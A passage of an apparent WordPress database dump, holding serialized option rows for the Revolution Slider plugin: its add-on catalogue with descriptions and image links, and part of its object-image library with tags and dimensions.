you!\";s:9:\"available\";s:5:\"2.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:74:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_weather.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"WT\";}}s:24:\"revslider-panorama-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:24:\"revslider-panorama-addon\";s:12:\"version_from\";s:7:\"5.4.5.2\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:8:\"Panorama\";s:6:\"line_1\";s:14:\"Panorama AddOn\";s:6:\"line_2\";s:25:\"Display images in 360Â°\";s:9:\"available\";s:5:\"2.1.3\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:75:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_panorama.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PN\";}}s:30:\"revslider-duotonefilters-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:30:\"revslider-duotonefilters-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:7:\"Duotone\";s:6:\"line_1\";s:7:\"Duotone\";s:6:\"line_2\";s:25:\"Because one is not enough\";s:9:\"available\";s:5:\"2.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:74:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_duotone.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:3:\"DTF\";}}s:23:\"revslider-refresh-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:23:\"revslider-refresh-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:8:\"(Re)Load\";s:6:\"line_1\";s:39:\"Reload the current page or a custom URL\";s:6:\"line_2\";s:34:\"after a certain time, loops, slide\";s:9:\"available\";s:5:\"2.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_reload.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"RF\";}}s:28:\"revslider-liquideffect-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:28:\"revslider-liquideffect-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Distortion\";s:6:\"line_1\";s:22:\"Add Distortion Effects\";s:6:\"line_2\";s:30:\"to your slides and transitions\";s:9:\"available\";s:5:\"2.0.4\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_distortion.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"LE\";}}s:31:\"revslider-explodinglayers-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:31:\"revslider-explodinglayers-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:16:\"Exploding Layers\";s:6:\"line_1\";s:23:\"Add explosive particles\";s:6:\"line_2\";s:24:\"to your layers animation\";s:9:\"available\";s:5:\"2.1.3\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_exploding.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"EL\";}}s:26:\"revslider-paintbrush-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:26:\"revslider-paintbrush-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Paintbrush\";s:6:\"line_1\";s:14:\"Paint or Erase\";s:6:\"line_2\";s:22:\"your background images\";s:9:\"available\";s:5:\"2.1.9\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_paintbrush.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PB\";}}s:29:\"revslider-domain-switch-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:29:\"revslider-domain-switch-addon\";s:12:\"version_from\";s:5:\"6.0.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:13:\"Domain Switch\";s:6:\"line_1\";s:17:\"Switch Image URLs\";s:6:\"line_2\";s:37:\"in sliders from one domain to another\";s:9:\"available\";s:5:\"1.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:79:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_domainswitch.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"DS\";}}s:25:\"revslider-mousetrap-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:25:\"revslider-mousetrap-addon\";s:12:\"version_from\";s:6:\"6.2.23\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:9:\"Mousetrap\";s:6:\"line_1\";s:31:\"Create all kinds of interesting\";s:6:\"line_2\";s:19:\" mouse interactions\";s:9:\"available\";s:5:\"2.0.8\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_mousetrap.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"MT\";}}s:26:\"revslider-whiteboard-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:26:\"revslider-whiteboard-addon\";s:12:\"version_from\";s:5:\"5.2.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Whiteboard\";s:6:\"line_1\";s:31:\"Create Hand-Drawn Presentations\";s:6:\"line_2\";s:45:\"that are understandable, memorable & engaging\";s:9:\"available\";s:5:\"2.2.3\";s:10:\"background\";s:81:\"//updates.themepunch-ext-b.tools/revslider/addons/images/whiteboard_widget_bg.jpg\";s:6:\"button\";s:11:\"How to use?\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_whiteboard.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"WB\";}}s:27:\"revslider-scrollvideo-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:27:\"revslider-scrollvideo-addon\";s:12:\"version_from\";s:5:\"6.3.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:12:\"Scroll Video\";s:6:\"line_1\";s:114:\"This addon allows you to generate a sequence of images from any html5 video and play them with scroll interaction.\";s:6:\"line_2\";s:49:\"Quality options are included for optimal results!\";s:9:\"available\";s:5:\"2.0.4\";s:10:\"background\";s:78:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_scrollvideo.jpg\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:78:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_scrollvideo.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SV\";}}s:22:\"revslider-slicey-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:22:\"revslider-slicey-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Slicey\";s:6:\"line_1\";s:20:\"Slice \'em up nicely!\";s:6:\"line_2\";s:38:\"Create image slices of your background\";s:9:\"available\";s:5:\"2.0.6\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_slicey.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SL\";}}s:24:\"revslider-revealer-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:24:\"revslider-revealer-addon\";s:12:\"version_from\";s:5:\"6.2.3\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Reveal\";s:6:\"line_1\";s:9:\"Reveal...\";s:6:\"line_2\";s:37:\"...your inner beast... and RevSliders\";s:9:\"available\";s:5:\"2.1.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_reveal.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"RV\";}}s:25:\"revslider-particles-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:25:\"revslider-particles-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:16:\"Particle Effects\";s:6:\"line_1\";s:17:\"Let\'s Parti(cle)!\";s:6:\"line_2\";s:51:\"Add interactive particle animations to your sliders\";s:9:\"available\";s:5:\"2.2.6\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_particles.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PT\";}}s:27:\"revslider-beforeafter-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:27:\"revslider-beforeafter-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Before & After\";s:6:\"line_1\";s:35:\"Compare two slides before and after\";s:6:\"line_2\";s:33:\"use it vertically or horizontally\";s:9:\"available\";s:5:\"2.0.8\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:78:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_beforeafter.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"BA\";}}s:27:\"revslider-bubblemorph-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:27:\"revslider-bubblemorph-addon\";s:12:\"version_from\";s:5:\"6.0.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:11:\"BubbleMorph\";s:6:\"line_1\";s:26:\"Include BubbleMorph Layers\";s:6:\"line_2\";s:33:\"for a decorative lava lamp effect\";s:9:\"available\";s:5:\"2.2.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:78:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_bubblemorph.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"BM\";}}}','yes'),(359,'revslider-library-check','1618148464','yes'),(360,'revslider-library-hash','dae3de1eb57eeeee008b70e9a23844b5','yes'),(361,'rs-library','a:3:{s:4:\"hash\";s:32:\"dae3de1eb57eeeee008b70e9a23844b5\";s:7:\"objects\";a:417:{i:0;a:12:{s:2:\"id\";s:3:\"198\";s:6:\"handle\";s:16:\"object_dvd_1.png\";s:4:\"name\";s:3:\"DVD\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-10-17 12:43:17\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:1;a:12:{s:2:\"id\";s:3:\"188\";s:6:\"handle\";s:18:\"object_plant_1.png\";s:4:\"name\";s:7:\"Plant 1\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-09-12 16:25:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:2;a:12:{s:2:\"id\";s:3:\"187\";s:6:\"handle\";s:16:\"object_pen_1.png\";s:4:\"name\";s:5:\"Pen 1\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-09-12 16:25:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:3;a:12:{s:2:\"id\";s:3:\"172\";s:6:\"handle\";s:16:\"object_egg_1.png\";s:4:\"name\";s:3:\"Egg\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"600\";s:6:\"height\";s:3:\"600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:4;a:12:{s:2:\"id\";s:3:\"171\";s:6:\"handle\";s:19:\"object_guitar_1.png\";s:4:\"name\";s:6:\"Guitar\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:5;a:12:{s:2:\"id\";s:3:\"170\";s:6:\"handle\";s:21:\"object_envelope_1.png\";s:4:\"name\";s:15:\"Closed Envelope\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:6;a:12:{s:2:\"id\";s:3:\"169\";s:6:\"handle\";s:19:\"object_postit_2.png\";s:4:\"name\";s:18:\"Postit Label White\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:7;a:12:{s:2:\"id\";s:3:\"168\";s:6:\"handle\";s:21:\"object_envelope_2.png\";s:4:\"name\";s:13:\"Open Envelope\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:8;a:12:{s:2:\"id\";s:3:\"167\";s:6:\"handle\";s:17:\"object_eggs_1.png\";s:4:\"name\";s:10:\"Egg Carton\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:9;a:12:{s:2:\"id\";s:3:\"166\";s:6:\"handle\";s:25:\"object_bottleopener_1.png\";s:4:\"name\";s:13:\"Bottle Opener\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:10;a:12:{s:2:\"id\";s:3:\"165\";s:6:\"handle\";s:23:\"object_blueprints_1.png\";s:4:\"name\";s:10:\"Blueprints\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:11;a:12:{s:2:\"id\";s:3:\"164\";s:6:\"handle\";s:22:\"object_holepunch_1.png\";s:4:\"name\";s:10:\"Hole punch\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:12;a:12:{s:2:\"id\";s:3:\"163\";s:6:\"handle\";s:20:\"object_speaker_1.png\";s:4:\"name\";s:13:\"Black Speaker\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:13;a:12:{s:2:\"id\";s:3:\"162\";s:6:\"handle\";s:19:\"object_eraser_1.png\";s:4:\"name\";s:6:\"Eraser\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"500\";s:6:\"height\";s:3:\"500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:14;a:12:{s:2:\"id\";s:3:\"161\";s:6:\"handle\";s:23:\"object_vinylcover_1.png\";s:4:\"name\";s:11:\"Vinyl Cover\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:15;a:12:{s:2:\"id\";s:3:\"160\";s:6:\"handle\";s:20:\"object_booklet_1.png\";s:4:\"name\";s:9:\"Booklet 1\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:16;a:12:{s:2:\"id\";s:3:\"159\";s:6:\"handle\";s:22:\"object_earphones_2.png\";s:4:\"name\";s:11:\"Earphones 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:17;a:12:{s:2:\"id\";s:3:\"158\";s:6:\"handle\";s:18:\"object_vinyl_1.png\";s:4:\"name\";s:5:\"Vinyl\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:18;a:12:{s:2:\"id\";s:3:\"157\";s:6:\"handle\";s:19:\"object_postit_1.png\";s:4:\"name\";s:17:\"Postit Label Pink\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:19;a:12:{s:2:\"id\";s:3:\"156\";s:6:\"handle\";s:23:\"object_mechpencil_1.png\";s:4:\"name\";s:17:\"Mechanical Pencil\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:20;a:12:{s:2:\"id\";s:3:\"155\";s:6:\"handle\";s:22:\"object_turntable_1.png\";s:4:\"name\";s:9:\"Turntable\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:21;a:12:{s:2:\"id\";s:3:\"154\";s:6:\"handle\";s:19:\"object_folder_2.png\";s:4:\"name\";s:19:\"Closed Folder Black\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:22;a:12:{s:2:\"id\";s:3:\"153\";s:6:\"handle\";s:19:\"object_postit_4.png\";s:4:\"name\";s:18:\"Postit Label Green\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:23;a:12:{s:2:\"id\";s:3:\"152\";s:6:\"handle\";s:19:\"object_folder_1.png\";s:4:\"name\";s:12:\"Blank Folder\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:24;a:12:{s:2:\"id\";s:3:\"151\";s:6:\"handle\";s:19:\"object_pencup_1.png\";s:4:\"name\";s:7:\"Pen Cup\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:25;a:12:{s:2:\"id\";s:3:\"150\";s:6:\"handle\";s:23:\"object_winebottle_1.png\";s:4:\"name\";s:15:\"Red Wine Bottle\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 